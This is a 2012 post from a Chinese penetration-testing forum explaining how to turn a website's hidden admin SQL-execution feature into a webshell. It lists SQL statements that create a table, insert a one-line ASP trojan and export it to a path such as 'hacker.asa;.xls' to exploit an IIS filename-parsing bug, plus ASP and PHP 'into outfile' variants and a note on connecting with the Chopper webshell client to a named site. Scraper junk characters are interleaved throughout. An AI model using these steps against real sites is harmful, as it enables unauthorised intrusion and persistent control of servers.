中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。- X# b, O# q: v, [
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的, n# }" L, X7 y3 S. x7 D+ y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
. T. Y; j( k1 E( T然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:, e5 W$ P: u( B1 T
1.create table cmd (a varchar(50))- h( J" n1 s, C
2.insert into cmd (a) values (‘‘)+ i, {$ V, p" |8 l& Y9 z
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
; v& s4 a% A. ]5 b(把表cmd的内容导出为物理路径的一个EXCEL文件)
! G1 ^* K6 C8 d; ~7 A6 l4.drop table cmd
# X/ ]$ e. G8 x: u8 f利用IIS的BUG成功拿到了WEBSHELL。
) g% ~. \$ x" O: g& o, P; C2 s
' t9 H7 I+ y2 J' b% e& ~直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话5 h3 x8 N. [/ N( r  {
5 |& y; |  y2 Y" r: }8 v
  SQL语句意思解释:
5 Y: U# l( U( v* N  第一句/ ]9 z: z6 g& B0 n. l
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
0 p* T0 [2 R: H: [# v/ ]: L: B& R1 }) D8 w6 R
  第二句
. A  \* |9 ~& @6 S* I) F  在表cmd的a字段插入一句话木马
: p; Q; C' Y+ @: q( y( e' R  第三句
; j( H6 X6 P& H1 ]8 E/ ~- [  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件7 ]" b! y% t" Y7 Z# V
- A) v. J/ {% C  f# z; e
  第四句
3 S, z9 Q. F, M) }' J& B  删除建立的cmd表9 `! P' ~  X" {9 X( O4 ]  ^+ ]
1 ~# t( J% S$ C. g
  以下内容为测试:
9 ]2 `( B; F+ S0 `  Access利用后台SQL执行命令功能导出WebShell:$ R; z1 F* D; {0 R! E
  这个更简单:% J+ H) s' e# n2 ^% N5 v& f7 r' e
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]3 z# c" K- M# T) z, A
  或者
) I& r) t! F! V& J7 T0 F" f2 u  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol], t7 c0 z* G) ^5 h& O' y
# }, ?) H/ K+ k0 T+ ]+ @
  后台有执行SQL语句功能(vote为已知表段)
  i/ s: y& |) r6 _6 c* m  希望对大家有所帮助拿shell的又一个思路
4 d( S& w) q7 I  f7 t7 a




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2